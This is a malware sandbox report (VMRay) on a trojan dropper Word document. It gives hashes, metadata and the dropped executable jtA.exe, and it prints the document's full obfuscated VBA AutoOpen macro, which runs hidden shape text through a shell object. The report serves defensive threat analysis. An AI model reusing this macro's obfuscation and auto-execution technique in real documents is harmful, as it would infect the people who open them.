6dd9d1ae...a9d7 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Trojan, Dropper, Downloader

6dd9d1ae591aa1c238d27b7d29b4d16775e02350637efc7659a7de6b062aa9d7 (SHA256)

Documento.doc

Word Document

Created at 2018-11-24 01:38:00

...

Notifications (1/1)

The operating system was rebooted during the analysis.

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Documento.doc Sample File Word Document
Blacklisted
...
»
Mime Type application/msword
File Size 87.50 KB
MD5 7bafd5f76166ab14d8f649f5ce1598eb Copy to Clipboard
SHA1 f38c3bcca561cd47d214dd5a4cf7aeabdfa855e3 Copy to Clipboard
SHA256 6dd9d1ae591aa1c238d27b7d29b4d16775e02350637efc7659a7de6b062aa9d7 Copy to Clipboard
SSDeep 768:AmkOAXVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBn+1ooSA8xNhHhvWmXl3fkZN:gOAXocn1kp59gxBK85fBn+aogvVMb Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
First Seen 2018-11-23 22:33 (UTC+1)
Last Seen 2018-11-24 00:13 (UTC+1)
Names Script-Macro.Trojan.F04ie00kn18
Families F04ie00kn18
Classification Trojan
Office Information
»
Revision 1
Create Time 2018-11-23 20:00:00+00:00
Modify Time 2018-11-23 20:00:00+00:00
Document Information
»
Codepage Latin-1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 2
Character Count 13
Chars With Spaces 14
Heading Pairs Title
scale_crop False
shared_doc False
VBA Macros (1)
»
Macro #1: dUwEOEHTNVszmI
» 
Attribute VB_Name = "dUwEOEHTNVszmI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case HSwlYD
         Case 257757641
            ktwci = 122407563
            oBEMov = CVKNEqC
            duDONW = 174492233
         Case 195417733
            iLiLuJo = ChrW(118414687)
            tltuC = CDate(342035667)
            iPcbKz = 319788673
      End Select
QQBYP = 34205939 + CByte(OXjicMNHM - Sqr(vzzQais)) * wiHzC - iOiuiI * CzAXVO / CDate(132798842) * 154488641 * 29085208 / (140562981 - Sin(47931546))
   On Error Resume Next
Select Case PGAvQJW
         Case 16120916
            MzVACum = 93186137
            nWRkjYTZ = qPhEKGahm
            YHWXG = 150069403
         Case 130871712
            ddNwRiOHP = ChrW(53480062)
            WcbrMfn = CDate(319101424)
            oOZUI = 225439692
      End Select
cRzKNQaq = 313295866 + CByte(tzzpCrSC - Sqr(bzQKrT)) * LIPDtoj - mqPwRGBkv * mpzSmWH / CDate(118483228) * 294822573 * 42734003 / (287773345 - Sin(79917165))
Set qnESb = Shapes("VEwXcPHJQ")
   On Error Resume Next
Select Case WCiCrK
         Case 94959251
            ZVpNW = 338396254
            LCwuUlM = XYOzQDUXd
            zLSiZs = 241308022
         Case 17750352
            oOYwONG = ChrW(280063780)
            JvFaKJKi = CDate(192156672)
            wBFwM = 305015506
      End Select
oDhdGKR = 67835489 + CByte(dzZAmKM - Sqr(OhNYBITu)) * aEaiQL - rZCJF * lnQmf / CDate(74574645) * 33232748 * 187661887 / (160391988 - Sin(263751666))
   On Error Resume Next
Select Case bCcSwItt
         Case 62958939
            qTfbQTYSq = 241712008
            huwnG = kOztD
            qMWqiKMTK = 212089469
         Case 154779694
            bjsuKFjv = ChrW(269225751)
            uHjfsFIi = CDate(66601943)
            nVoOt = 194479237
      End Select
IdRqBWJMa = 72392160 + CByte(EtKHJJSOJ - Sqr(RHKfW)) * zFrdAjP - RXrslXS * uSaQrj / CDate(79700448) * 205082066 * 316594134 / (208433688 - Sin(132135653))
   On Error Resume Next
Select Case XjTLjk
         Case 272466793
            iHoYSFt = 30910577
            wwahHwOZ = HHAvw
            RKkFTpj = 7829555
         Case 166312401
            zPFOo = ChrW(280412632)
            GTdiXlQ = CDate(248379269)
            mjchX = 259761430
      End Select
MGIUn = 247324762 + CByte(MwBZJiIKL - Sqr(ducVtu)) * UUODDYr - KGsIjWqU * QlWLHDw / CDate(182868611) * 137068485 * 74934513 / (25246229 - Sin(195035003))
   On Error Resume Next
Select Case vPJlFddU
         Case 83662727
            GrDRw = 161097481
            miwzJ = LwWiJEvTr
            aIWXqlkw = 173026373
         Case 173062759
            iobZdiJ = ChrW(159326751)
            zmmVzojv = CDate(129334447)
            RnOEcJ = 171647089
      End Select
MAuAW = 231073262 + CByte(hIuJjZ - Sqr(vKnoWBZB)) * pcJJm - kzQDdz * mzPDAQj / CDate(270004175) * 249278613 * 257141300 / (283510404 - Sin(206443375))
NGHcX = "" + MjATXo + JozcQC + qnESb.TextFrame.TextRange.Text + nZBEIYNN + biNnGz + vwWWzl
   On Error Resume Next
Select Case EFLQMF
         Case 60402980
            joEpW = 64204107
            MDHAZ = nkSoBTpEI
            jMsOzOtqT = 14010629
         Case 238657475
            FoFrBN = ChrW(250379425)
            cUBaQV = CDate(299587719)
            LlTzbsY = 187766084
      End Select
uHwJRhX = 51601780 + CByte(idjJRcS - Sqr(TLLSwiUSi)) * iklMPcOH - nBKnd * qqPrCT / CDate(283450354) * 217961172 * 206113423 / (166769425 - Sin(87462931))
   On Error Resume Next
Select Case ajUsY
         Case 214145158
            roHRp = 119799939
            rAcul = dfhMTK
            OwfKZazH = 276571149
         Case 316614470
            qQuUBzYw = ChrW(239035644)
            FXZvzBdu = CDate(10672070)
            YOzms = 58436433
      End Select
rPSzBDsDV = 132102376 + CByte(ikoWa - Sqr(IaGPcZVMo)) * KcRHbsAj - RnETjrch * QRTCnEd / CDate(119055128) * 16611440 * 220984291 / (101507220 - Sin(275546596))
   On Error Resume Next
Select Case aKcJPzvpp
         Case 303616761
            mqiYwQq = 332337074
            GLDbHaXO = oKwJQD
            NJBtaLCJZ = 196645553
         Case 230287373
            OhRUNspO = ChrW(47031918)
            BoZhW = CDate(6763974)
            ddZiajHp = 30767910
      End Select
vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116))
Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
   On Error Resume Next
Select Case mUrst
         Case 186451845
            vIQDrIjan = 163009547
            CZYXzh = VijHnu
            iYnrsbcRC = 6520647
         Case 316895163
            hjfYiU = ChrW(310809253)
            bnjOV = CDate(62228553)
            XzMnVWE = 55511792
      End Select
sjvznkWX = 177402935 + CByte(AlpGCmrs - Sqr(vsYWiAF)) * qNapdX - fvZzOrQIo * IohqKBdd / CDate(212186606) * 86648906 * 278037853 / (132435848 - Sin(83846958))
   On Error Resume Next
Select Case BlHJUCk
         Case 111496066
            jKppXQJl = 323244506
            iiLurA = TjjksEFPD
            VEXBVWNbs = 141762667
         Case 256186244
            uOCrcTtq = ChrW(277976096)
            JaiAhE = CDate(283733543)
            jZUao = 214065081
      End Select
SNHzTzi = 48045115 + CByte(pViBcmVM - Sqr(FvwSUpIkl)) * NSTZVRJF - sXPiTBKL * qdwDHbi / CDate(240638640) * 191579159 * 604223 / (295659657 - Sin(121480391))
   On Error Resume Next
Select Case nwsTzj
         Case 233460576
            CnFCkEiE = 179595011
            IUQPnofEd = NcnzapW
            wSpadiBBv = 236688675
         Case 266889696
            JLiMCvDX = ChrW(73742834)
            nuGOb = CDate(171529493)
            IbvhlGJFi = 282633276
      End Select
OmtvPuLB = 300174018 + CByte(vflziui - Sqr(TODbBnItB)) * FZHTESJ - KsiMDZj * NwJiCLi / CDate(71392612) * 100343537 * 184342520 / (221827915 - Sin(252803337))
Const wtMkT = 0
   On Error Resume Next
Select Case iGjXmlKnA
         Case 331244510
            laDnP = 157788500
            tzFul = FoljNcXON
            cAbKZPVni = 4150645
         Case 247283387
            KXBzfnpAu = ChrW(260927616)
            mSzzbZY = CDate(174286658)
            YdbnnNai = 184092140
      End Select
LkLIiO = 224433025 + CByte(wkZMCo - Sqr(psbPuOK)) * zYjvNMS - KZcbkb * TltLb / CDate(274542214) * 98394300 * 81551298 / (178637397 - Sin(255809039))
bJZMhfmkz.Run@ NGHcX, wtMkT
   On Error Resume Next
Select Case NEHTiuYJB
         Case 294796856
            DkoKE = 201904601
            VonZQSdV = VwZhO
            LSHPOiH = 107961806
         Case 242020974
            KCiVH = ChrW(296419237)
            fUjDFn = CDate(264476594)
            pNsDNcLu = 188883186
      End Select
VDoQCOY = 20614948 + CByte(GPvzuch - Sqr(MiWFfTbYV)) * NXYwIF - lpaORVfCO * YuNwafhw / CDate(103105344) * 38646926 * 130561702 / (282964539 - Sin(235409846))
   On Error Resume Next
Select Case RAZAaOlmq
         Case 244152187
            ASZiWtJO = 266942196
            LSvBmTzH = KctmThnE
            rbLWKLYH = 5540673
         Case 232215129
            aJKVQ = ChrW(35190852)
            dznvmfCa = CDate(22551452)
            jGzjp = 177185066
      End Select
MVpHjdi = 121320173 + CByte(DNBRYW - Sqr(zJFvvp)) * UkIQbumU - inIuQatW * cWboY / CDate(247911660) * 232130652 * 66118830 / (291445427 - Sin(325336249))
End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe Created File Binary
Blacklisted
...
»
Also Known As c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe (Created File)
Mime Type application/x-dosexec
File Size 132.00 KB
MD5 912807d798d35323a534fdb59399a9b0 Copy to Clipboard
SHA1 2060d9f147311fdeec4de5f5d940b7a6f849846d Copy to Clipboard
SHA256 78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843 Copy to Clipboard
SSDeep 3072:ePsv/P6gmhkFDDQKSZ4k5AF6xIsawMlkgu866:S9QD+zyF6xIsaFXP Copy to Clipboard
ImpHash 83eb829a030547eb063d860f40f8e0c6 Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
First Seen 2018-11-23 20:48 (UTC+1)
Last Seen 2018-11-23 21:02 (UTC+1)
Names Win32.Trojan.Encpk
Families Encpk
Classification Trojan
PE Information
»
Image Base 0x400000
Entry Point 0x403420
Size Of Code 0x3000
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 1995-11-13 23:08:05+00:00
Version Information (5)
»
- -
InternalName o
CompanyName -
FileVersion -
FileDescription ODBC
Sections (7)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
sijJ 0x401000 0x261a 0x3000 0x1000 cnt_code, mem_execute, mem_read 5.71
.yk 0x404000 0x6f0 0x1000 0x4000 cnt_initialized_data, mem_read 2.31
.data 0x405000 0x2ec4 0x1000 0x5000 cnt_initialized_data, mem_read, mem_write 3.95
DATA 0x408000 0x1a33 0x2000 0x6000 cnt_initialized_data, mem_read, mem_write 7.13
CONST 0x40a000 0x165ec 0x17000 0x8000 cnt_initialized_data, mem_read, mem_write 7.93
.rsrc 0x421000 0x590 0x1000 0x1f000 cnt_initialized_data, mem_read 1.32
J 0x422000 0x594 0x1000 0x20000 cnt_initialized_data, mem_discardable, mem_read 2.91
Imports (3)
»
KERNEL32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrlenW 0x0 0x404008 0x4610 0x4610 0x54e
lstrcpyW 0x0 0x40400c 0x4614 0x4614 0x548
GetCommandLineW 0x0 0x404010 0x4618 0x4618 0x187
USER32.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFocus 0x0 0x404018 0x4620 0x4620 0x12c
IsWindowVisible 0x0 0x40401c 0x4624 0x4624 0x1e0
GetKeyState 0x0 0x404020 0x4628 0x4628 0x13d
SetCursorPos 0x0 0x404024 0x462c 0x462c 0x28a
SetCapture 0x0 0x404028 0x4630 0x4630 0x280
GetScrollPos 0x0 0x40402c 0x4634 0x4634 0x176
ESENT.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
JetUpdate 0x0 0x404000 0x4608 0x4608 0x14b
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 48.00 KB
MD5 0d7742564c1bf905226155ddc8801d2b Copy to Clipboard
SHA1 72fd26e88b22a795f79e85703fb4a6ce40a994e0 Copy to Clipboard
SHA256 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da Copy to Clipboard
SSDeep 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP Copy to Clipboard
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 32.00 KB
MD5 b25ed5680eaebd743130ba81c6fa3e7f Copy to Clipboard
SHA1 bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17 Copy to Clipboard
SHA256 cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779 Copy to Clipboard
SSDeep 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO Copy to Clipboard
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 64.00 KB
MD5 29205bc6727f0b2b394d25d0018c253d Copy to Clipboard
SHA1 486aa84638d334c0d96aa32d0bf05638ee10deaa Copy to Clipboard
SHA256 5b8533df6abc601a53ad41667ee7f14dccaa08505bb4aae0ff72dae34b813d8d Copy to Clipboard
SSDeep 96:qvzEMiozzcwjQ2ubh9NdeigWEsy7X66irdu0f2VRozqAUttkqYY1Ig9tPCRT8:YzV8TQ76rdu9fAwYOM Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image